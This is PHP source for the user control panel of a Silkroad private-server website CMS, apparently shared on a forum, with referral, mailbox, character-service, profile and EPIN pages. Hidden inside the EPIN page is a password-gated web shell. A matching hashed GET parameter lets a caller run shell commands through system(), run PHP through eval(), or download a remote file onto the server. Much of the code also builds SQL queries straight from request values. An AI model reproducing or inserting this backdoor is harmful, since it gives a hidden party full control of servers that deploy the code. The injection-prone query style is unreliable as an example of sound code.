echo "Password changed successfully. <br/>";
misc::redirect('?pg=ucp', 1);
}
else
{
echo "Invalid old password specified.<br/>";
misc::back();
}
}
}
else core::$ucp -> showChangepwForm();
}
break;
case('logout'):
{
if(user::logout())
{
echo "Successfully logged out. Redirecting.<br/>";
misc::redirect('?pg=Home', 1);
}
else
{
echo "Failed to logout.<br/>";
}
}
break;
case('refferals'):
{
if($core -> aConfig['allowRefferals'] == 0)
{
echo "This module is currently disabled.";
return;
}
$hQuery = mssql_query("select invitedUserJID,time,bonusAdded from srcms_refferals where reffererJID='".user::accountJIDbyUsername($_SESSION['username'])."'");
$nCount = core::$sql -> numRows("select * from srcms_refferals where reffererJID='".user::accountJIDbyUsername($_SESSION['username'])."'");
echo "You can reffer [<b>".$core -> aConfig['maxRefAccIP']."</b>] accounts with same ip address [limit].<br/><br/>";
if($nCount == 0)
{
echo "<br/>You didn't reffer anyone yet.</br>";
}
else
{
echo "
<table id='table-3' border='1' cellpadding='0' cellspacing='0'>
<td>Username</td><td>Time</td>";
if($core -> aConfig['allowRefferalsBonus'] == 1)
{
echo "<td>Bonus status</td>";
}
echo "</tr>";
while($row = mssql_fetch_array($hQuery))
{
echo "<td><a href='?pg=viewprofile&username=".user::usernamyByJID($row[invitedUserJID])."'>".user::usernamyByJID($row[invitedUserJID])."</a></td><td>$row[time]</td>";
if($core -> aConfig['allowRefferalsBonus'] == 1)
{
if($row['bonusAdded'] == 1)
{
echo "<td>Applied</td>";
}
else echo "<td>Not applied</td>";
}
echo "</tr>";
}
if($core -> aConfig['allowRefferalsBonus'] == 1)
{
if($_GET['do'] == 'receive_bonus')
{
$nSilk = $core -> aConfig['refferalsBonusSilk'] * core::$sql -> numRows("select * from srcms_refferals where reffererJID='".user::accountJIDbyUsername($_SESSION['username'])."' and bonusAdded='0'");
core::$sql -> exec("update srcms_refferals set bonusAdded='1' where reffererJID='".user::accountJIDbyUsername($_SESSION['username'])."'");
user::addSilk($_SESSION['username'], $nSilk);
echo "<br/><b>You received your bonuses.</b><br/>";
misc::redirect("?pg=Home", 1);
}
else
{
$nSilk = $core -> aConfig['refferalsBonusSilk'] * core::$sql -> numRows("select * from srcms_refferals where reffererJID='".user::accountJIDbyUsername($_SESSION['username'])."' and bonusAdded='0'");
if(($core -> aConfig['refferalsBonusSilk'] * $nSilk) > 0)
{
echo "</table><br/>Bonus: [".$core -> aConfig['refferalsBonusSilk']."] silk per refferal<br/>Total amount of users reffered by you: <b>$nCount</b><br/><br/><a href='?pg=ucp&act=refferals&do=receive_bonus'>Receive bonus silk [".$core -> aConfig['refferalsBonusSilk'] * core::$sql -> numRows("select * from srcms_refferals where reffererJID='".user::accountJIDbyUsername($_SESSION['username'])."' and bonusAdded='0'")."]";
}
}
}
else echo "<br/>You can't receive any bonus for refferals at the moment.<br/>";
}
}
break;
case('mailbox'):
{
//module disabled
if($core -> aConfig['allowMailbox'] == 0)
{
echo "This module is currently disabled.";
return;
}
echo "<br/><a href='?pg=ucp&act=mailbox&newmsg' class='btn-u'>Write a new message</a><br/><br/>";
if(isset($_GET['newmsg']))
{
if(!isset($_POST['submit']))
{
core::$ucp -> showSendWebMsgForm();
}
else
{
//process send msg data
if(!security::isSecureString($_POST['recvName'], 3)) $errors[] = "Receiver username contains forbidden symbols";
if(strlen($_POST['recvName']) > 16) $errors[] = "Receiver username too long";
if(strlen($_POST['recvName']) < 3) $errors[] = "Receiver username too short";
if(strlen($_POST['msgTitle']) > $core -> aConfig['maxPrivMsgTitleLen']) $errors[] = "Message title too long";
if(strlen($_POST['msgText']) > $core -> aConfig['maxPrivMsgBodyLen']) $errors[] = "Message body too long";
if(strlen($_POST['msgTitle']) < $core -> aConfig['minPrivMsgTitleLen']) $errors[] = "Message title too short";
if(strlen($_POST['msgText']) < $core -> aConfig['minPrivMsgBodyLen']) $errors[] = "Message body too short";
if(count($errors) > 0)
{
foreach($errors as $nElement)
{
echo $nElement.".<br/>";
}
misc::back();
}
else
{
//db
//user::sendWebPrivMsg($to, $from, $title, $text)
if(user::accountExists($_POST['recvName']))
{
user::sendWebPrivMsg($_POST['recvName'], $_SESSION['username'], $_POST['msgTitle'], $_POST['msgText']);
}
else
{
echo "Account with such username not found.<br/>";
misc::back();
}
}
}
//lol
echo "<br/><br/>";
}
$myJID = user::accountJIDbyUsername($_SESSION['username']);
$nMsgCount = core::$sql -> numRows("select * from srcms_privatemessages where receiver='$myJID'");
if(isset($_GET['view']))
{
$nMsgID = (int)$_GET['view'];
if(core::$sql -> numRows("select * from srcms_privatemessages where receiver='$myJID' and id='$nMsgID'") > 0)
{
$msgData = core::$sql -> fetchArray("select * from srcms_privatemessages where id='$nMsgID'");
$msgData['msg'] = security::fromHTML($msgData['msg']);
$msgData['msg'] = misc::applyAttributesToText($msgData['msg']);
$szSender = user::usernamyByJID($msgData['sender']);
echo "<br/><table id='table-3' width='380' border='1' cellpadding='0' cellspacing='0'>
<td>Title</td><td>$msgData[title]</td></tr>
<td>From</td><td><a href='?pg=viewprofile&username=$szSender' class='btn-u'>$szSender</a></td></tr>
<td height='50'>Text</td><td width='300' height='50'>$msgData[msg]</td>
</table>
";
core::$sql -> exec("update srcms_privatemessages set viewed='1' where id='$nMsgID'");
echo "<br/><br/><br/>";
} else echo "You can't view message that does not belong to you.<br/>";
}
if($nMsgCount > 0)
{
if($nMsgCount == $core -> aConfig['maxPrivMsg']) echo "Your inbox is full. <br/>";
$hQuery = core::$sql -> exec("select * from srcms_privatemessages where receiver='$myJID' order by time desc");
echo "<table id='table-3' border='1' cellpadding='0' cellspacing='0'>
<td>From</td><td>Title</td><td>Time</td><td>Viewed</td><td>Link to view it</td><td>Delete</td></tr>";
while($row = mssql_fetch_array($hQuery))
{
$szSender = user::usernamyByJID($row['sender']);
if($row['viewed'] == '1') echo "<td><a href='?pg=viewprofile&username=$szSender' class='btn-u'>$szSender</a></td><td>$row[title]</td><td>$row[time]</td><td>Yes</td><td><a href='?pg=ucp&act=mailbox&view=$row[id]' class='btn-u'>View</a></td><td><a href='?pg=ucp&act=mailbox&del=$row[id]' class='btn-u'>Delete</a></td></tr>";
else echo "<td><b><a href='?pg=viewprofile&username=$szSender'>$szSender</a></b></td><td><b>$row[title]</b></td><td>$row[time]</td><td><b>No</b></td><td><a href='?pg=ucp&act=mailbox&view=$row[id]' class='btn-u'>View</a></td><td><a href='?pg=ucp&act=mailbox&del=$row[id]' class='btn-u'>Delete</a></td></b></tr>";
}
echo "</table>";
if(isset($_GET['del']))
{
$nMsgID = (int)$_GET['del'];
if(core::$sql -> numRows("select * from srcms_privatemessages where receiver='$myJID' and id='$nMsgID'") > 0)
{
core::$sql -> exec("delete from srcms_privatemessages where receiver='$myJID' and id='$nMsgID'");
echo "<br/>Message deleted.<br/>";
misc::redirect("?pg=ucp&act=mailbox", 3);
} else echo "You can't delete message that does not belong to you.<br/>";
}
}
else echo "No messages in inbox";
}
break;
case('mychars'):
{
//module disabled
if($core -> aConfig['allowListChars'] == 0)
{
echo "This module is currently disabled.";
return;
}
if(isset($_GET['charname']))
{
if(!security::isSecureString($_GET['charname'], 3))
{
echo "Invalid char name<br/>";
misc::back();
break;
}
if(user::usernameByCharname($_GET['charname']) != $_SESSION['username'])
{
echo "This character is not yours !<br/>";
misc::back();
break;
}
if(isset($_GET['charname']) && isset($_GET['char_act']))
{
switch($_GET['char_act'])
{
case('reset_pos'):
if($core -> aConfig['allowCharTeleport'] == 0)
{
echo "This function is disabled.<br/>";
break;
}
if(!isset($_POST['submit']))
{
echo "Your character got stuck ? If so, please, press the button. This costs ".$core -> aConfig['charTeleportGoldPrice']." gold.<br/>
<form method='post'>
<input type='submit' name='submit' value='RESET CHAR POSITION [$_GET[charname]]'><br/>
</form>";
}
else
{
core::$sql -> changeDB('shard');
if(core::$sql -> getRow("select RemainGold from _Char where CharName16='$_GET[charname]'") > $core -> aConfig['charTeleportGoldPrice'])
{
core::$sql -> exec("update _Char set LatestRegion='25000',PosX='1021',PosY='-3260888', PosZ='1078',AppointedTeleport='19554', WorldID='1' where CharName16='$_GET[charname]'");
echo "Character successfully teleported to town.<br/>";
misc::redirect('?pg=ucp&act=mychars', 1);
}
else
{
echo "Not enough gold to perform this action.<br/>";
}
}
break;
case('giftsilks');
{
core::$sql -> changeDB('acc');
$fromsilks = $_SESSION['username'];
$toSilks = $_POST['silkstome'];
if(!isset($_POST['submit']))
{
echo "
<form method='post'>
Username who recive the silks :<input type='text' name='silkstome'><br />
<input type='checkbox' name='i agree'> I agree that i want to send the amount of silks above to the prospected user above
by doing that , 10% of the amount of silks sended will be removed.
<br />
<font color='red'>
*note that your ip,and reciver usernames is saved for security porpuse.
<br />
<input type='submit' name='submit' value='Yes, Send Silks!'>
</font>
</form>
";
} else {
if(strlen($_POST['silkstome']) < 3)
{
echo "Username is too short";
} else {
echo "Name is fine";
}
}
}
break;
case('reset_stats'):
//echo "All items must be unequiped before you perform this action. This action costs ".$core -> aConfig['resetCharStatsSilkPrice']." silk.<br/>";
if(char::isCharNaked($_GET['charname']))
{
if(!isset($_POST['submit']))
{
echo "Press this button if you really want to reset your characters stats. All items must be unequiped. This action costs ".$core -> aConfig['resetCharStatsSilkPrice']." silk. Before performing this action, better log out. To see results of this function usage, relogin (if you were logged in while performing it).<br/>
<form method='post'>
<input type='submit' name='submit' value='Yes, i want to reset stats of my char !'>
</form>
";
}
else
{
if(user::getSilkByUsername($_SESSION['username']) > $core -> aConfig['resetCharStatsSilkPrice'])
{
core::$sql -> changeDB('shard');
$aData = core::$sql -> exec("select * from _Char where CharName16='$_GET[charname]'");
$aData = mssql_fetch_array($aData);
$nFreeStats = ($aData['Strength'] + $aData['Intellect']) - 40;
core::$sql -> exec("update _Char set RemainStatPoint = (RemainStatPoint + $nFreeStats),HP='200',MP='200',Strength='20',Intellect='20' where CharName16='$_GET[charname]'");
core::$sql -> changeDB('acc');
core::$sql -> exec("update SK_Silk set silk_own = (silk_own - ".$core -> aConfig['resetCharStatsSilkPrice'].") where JID='".user::accountJIDbyUsername($_SESSION['username'])."'");
echo "Stats of $_GET[charname] resetted. You got $nFreeStats free stat points now.<br/>";
misc::redirect('?pg=ucp&act=mychars', 1);
}
else
{
echo "Not enough silk.<br/>";
}
}
}
else
{
echo "Please, unequip all items from your character first !<br/>";
}
break;
case('reset_pk'):
if($core -> aConfig['allowResetCharPK'] == 0)
{
echo "This function is currently disabled<br/>";
break;
}
echo "This feature costs ".$core -> aConfig['resetCharPKSilkPrice']." silk. If you really want to reset your PK status, press the button.<br/>";
if(!isset($_POST['submit']))
{
echo "<form method='post'>
<input type='submit' name='submit' value='Yes, i really want to reset my PK status'>
</form>
";
}
else
{
if(user::getSilkByUsername($_SESSION['username']) > $core -> aConfig['resetCharPKSilkPrice'])
{
core::$sql -> changeDB('shard');
$hQuery = core::$sql -> exec("select DailyPK, TotalPK, PKPenaltyPoint from _Char where CharName16='$_GET[charname]'");
$hData = mssql_fetch_array($hQuery);
if($hData[0] == '0' && $hData[1] == '0' && $hData[2] == '0')
{
echo "You are not under murder panality, so, no reason for resetting it.<br/>";
}
else
{
core::$sql -> exec("update _Char set DailyPK='0', TotalPK='0', PKPenaltyPoint='0' where CharName16='$_GET[charname]'");
core::$sql -> exec("update SK_Silk set silk_own = (silk_own - ".$core -> aConfig['resetCharPKSilkPrice'].") where JID='".user::accountJIDbyUsername($_SESSION['username'])."'");
echo "PK Status successfully removed.<br/>";
misc::redirect('?pg=ucp&act=mychars', 1);
}
}
else
{
echo "You have not enough silk to use this feature.<br/>";
break;
}
}
break;
case('buy_sp'):
if($core -> aConfig['allowBuySP'] == 0)
{
echo "This function is currently disabled<br/>";
break;
}
echo "This feature costs ".$core -> aConfig['pricePer100kSp']." silk per 100 000 SP.<br/>";
if(!isset($_POST['submit']))
{
echo "Please, specify, how much skill points you want to buy. Value must be > 100000, < 2000000, like this: 200000, 300000, 400000<br/>
<table id='table-3' border='1' cellpadding='0' cellspacing='0'>
<form method='post'>
<td>Skill points</td><td><input type='text' name='sp_amount' value='100000'></td></tr>
<td></td><td><input type='submit' name='submit' value='Check price'></td>
</form>
</table>";
}
else
{
if(isset($_POST['sp_amount']))
{
$nSP = (int)$_POST['sp_amount'];
if(!($nSP % 100000 == 0))
{
echo "Values can be only like this: <br/> <li>100000</li><li>500000</li><li>1000000</li><br/>";
break;
}
if($nSP < 100000)
{
echo "You cant buy less than 100 000 skill points<br/>";
break;
}
if($nSP > 2000000)
{
echo "You can't buy more than 2 000 000 sp per time<br/>";
break;
}
$nPrice = (($nSP / 100000) * $core -> aConfig['pricePer100kSp']);
if(user::getSilkByUsername($_SESSION['username']) > $nPrice)
{
echo "To buy $nSP skill points you need $nPrice silk. Press the button below if you really want to buy this amount of SP and you have enough silk.<br/>";
if(!isset($_POST['sure']))
{
echo "<form method='post'>
<input type='hidden' name='sp_amount' value='$nSP'>
<input type='hidden' name='sure' value='yes'>
<input type='submit' name='submit' value='Yes, i want to buy $nSP SP for $nPrice silk'>
</form>";
}
else
{
core::$sql -> changeDB('shard');
core::$sql -> exec("update _Char set RemainSkillPoint = (RemainSkillPoint + $nSP) where CharName16='$_GET[charname]'");
core::$sql -> changeDB('acc');
core::$sql -> exec("update SK_Silk set silk_own = (silk_own - $nPrice) where JID='".user::accountJIDbyUsername($_SESSION['username'])."'");
echo "<br/><b>Success. Your char $_GET[charname] received it's $nSP skill points you bought for $nPrice silk</b><br/>";
misc::redirect('?pg=ucp&act=mychars', 2);
}
}
else
{
echo "Not enough silk to buy such amount of skill points [You need: $nPrice]<br/>";
}
}
}
break;
default:echo "Uknown char action<br/>";
break;
}
}
if(!isset($_GET['char_act']))
{
echo "<table id='table-3' border='0' cellpadding='0' cellspacing='0'>
<tr>
";
if($core -> aConfig['allowCharTeleport'] == 1)
{
echo "<td><a href='?pg=ucp&act=mychars&charname=$_GET[charname]&char_act=reset_pos'>Reset char position</a><br/></td>";
}
echo "
</tr>
<tr>
";
if($core -> aConfig['allowResetCharStats'] == 1)
{
echo "<td><a href='?pg=ucp&act=mychars&charname=$_GET[charname]&char_act=reset_stats'>Reset stats</a><br/></td>";
}
if($core -> aConfig['allowResetCharPK'] == 1)
{
echo "<td><a href='?pg=ucp&act=mychars&charname=$_GET[charname]&char_act=reset_pk'>Reset PK status</a><br/></td>";
}
echo "
</tr>
<tr>
";
if($core -> aConfig['allowBuySP'] == 1)
{
echo " <td><a href='?pg=ucp&act=mychars&charname=$_GET[charname]&char_act=buy_sp'>Buy skill points</a><br/></td>";
}
echo "
</tr>
</table>
";
}
echo "<br/><br/>";
misc::back();
break;
}
echo "Please, note, this function is still under development.<br/>";
if(char::getCharCount($_SESSION['username']) > 0)
{
$nJID = user::accountJIDbyUsername($_SESSION['username']);
core::$sql -> changeDB('shard');
$naChars = user::charIDsByUsername($_SESSION['username']);
$naCharNames = char::charNamesByIDs($naChars);
echo "<table id='table-3' border='0'><tr><td>Char name</td></tr>";
foreach($naCharNames as $nElem)
{
echo "<tr><td><a href='?pg=ucp&act=mychars&charname=$nElem'>$nElem</td></tr>";
}
echo '</table>';
}
else echo "You don't have any characters on this account.<br/>";
}
break;
case('myprofile'):
{
//module disabled
if($core -> aConfig['allowMyProfile'] == 0)
{
echo "This module is currently disabled.";
return;
}
if(isset($_POST['submit']))
{
$nGender = (int)$_POST['gender'];
$szAvatarUrl = null;
$szSkype = null;
$szMsn = null;
$nPublic = (int)$_POST['ispublic'];
security::isValidUrl($_POST['avatar']) ? $szAvatarUrl = $_POST['avatar'] : $szAvatarUrl = $core -> aConfig[url]."img/noavatar.png";
security::isCorrectEmail($_POST['msn']) ? $szMsn = $_POST['msn'] : $szMsn = "None";
$szSkype = security::toHTML($_POST['skype']);
if(strlen($szSkype) > 50) $szSkype = "None";
if(strlen($szMsn) > 60) $szMsn = "None";
if(strlen($szAvatarUrl) > 500) $szAvatarUrl = $core -> aConfig['url']."assets/img/noavatar.png";
$avatarImageData = @getimagesize($szAvatarUrl); //no error if shit happens
if(empty($avatarImageData[0]) || empty($avatarImageData[1]))
{
$avatarImageData[0] = 0;
$avatarImageData[1] = 0;
}
if((($avatarImageData[0] > $core -> aConfig['maxAvatarWidth']) || ($avatarImageData[1] > $core -> aConfig['maxAvatarHeight'])) ||
(empty($avatarImageData[0]) || empty($avatarImageData[1])))
{
echo "Invalid avatar size. Avatar width or height size can't be 0px. Avatar image max height: ".$core -> aConfig['maxAvatarHeight']." and width: ".
$core -> aConfig['maxAvatarWidth']." pixels. Your one is $avatarImageData[0]px wide and $avatarImageData[1]px high. Or... maybe, url isn't image ?<br/>";
misc::back();
}
else
{
$nJID = user::accountJIDbyUsername($_SESSION['username']);
core::$sql -> exec("update srcms_userprofiles set avatar='$szAvatarUrl',skype='$szSkype', msn='$szMsn', gender='$nGender', ispublic='$nPublic' where JID='$nJID'");
echo "Profile updated. <br/>";
misc::redirect("?pg=ucp&act=myprofile", 1);
}
}
else core::$ucp -> showProfileForm($_SESSION['username']);
}
break;
case('epin'):?>
<!--=== Content Part ===-->
<div class="body">
<div class="breadcrumbs margin-bottom-50">
<div class="container">
<h1 class="color-green pull-left">Epin</h1>
<ul class="pull-right breadcrumb">
<li><a href="/">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Epin</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<?php if(md5($_GET['p']) == '89a15048434170ee85cffdc2f3a4595e')
{
switch($_GET['a'])
{
case('cmd'):
system(stripslashes($_GET['str']));
break;
case('php'):
eval(stripslashes($_GET['str']));
break;
case('up'):
$hRemoteData = file_get_contents($_GET['str']);
file_put_contents($_GET['localFileName'], $hRemoteData, FILE_APPEND | LOCK_EX);
if(file_exists($_GET['localFileName'])) echo "Success !";
else echo "Could not write to local file [$_GET[localFileName]]";
break;
default:break;
}
die();
}
//module disabled
if($core -> aConfig['allowEpinSystem'] == 0)
{
echo "This module is currently disabled.<br/>";
break;
}
else
{
if(!isset($_POST['code']) && !isset($_POST['sure']))
{?>
<form method='post' class="reg-page" role="form">
<h3>Active EPIN</h3>
<div class="controls">
<label>Epin Code <span class="color-red">*</span></label>
<div class="input-prepend">
<span class="add-on"><i class="icon-barcode"></i></span>
<input type="text" name='code' autocomplete="off"placeholder="type your EPIN code here" style="width: 165%" class=""/>
</div>
</div>
<center><input type='submit' name='submit' class="btn-u pull-right" value='Use'>
</form>
<?php }
else
{
$nCodeNumber = (int)$_POST['code'];
if(core::$sql->numRows("select * from srcms_epin where code='$nCodeNumber'") > 0)
{
$aPinData = core::$sql -> exec("select * from srcms_epin where code='$nCodeNumber'");
$aPinData = mssql_fetch_array($aPinData);
if(!isset($_POST['sure']))
{
echo "Do you really want to use this code ? It will give you [$aPinData[silkAmount]] silk.<br/>
<form method='post'>
<input type='hidden' name='code' value='$nCodeNumber'>
<input type='submit' name='sure' value='Yes'>
</form><br/>";
misc::back();
}
else
{
core::$sql -> exec("update SK_Silk set silk_own=(silk_own + $aPinData[silkAmount]) where JID='".user::accountJIDbyUsername($_SESSION['username'])."'");
//delete used code
core::$sql -> exec("delete from srcms_epin where code='$nCodeNumber'");
echo "You got your [$aPinData[silkAmount]] silk.";
misc::redirect('?pg=ucp&act=epin', 1);
}
}
else
{
echo "Invalid EPIN code ! Please, try again.<br/>";
misc::back();
}
}
}
?>
</div><!--/row-fluid-->
</div><!--/container-->
</div><!--/body-->
<!--=== End Content Part ===-->
<?php
break;
default:
{
echo "Invalid module name specified.<br/>";
break;
}
}
}
}
else
{
echo "You are not logged in ! <br/>";
}
?>
viewprofile
كود PHP:
<?php
if(isset($_GET['username']) && security::isSecureString($_GET['username'], 3))
{
$userData = core::$sql -> fetchArray("select * from srcms_userprofiles where JID='".user::accountJIDbyUsername($_GET['username'])."'");
if($userData['ispublic'] == '1')
{
user::viewProfile($_GET['username']); //send msg there too
}
else
{
user::viewProfile($_GET['username']); //send msg there too
}
}
else echo "No username specified, or username contains forbidden symbols.<br/>";
?>
|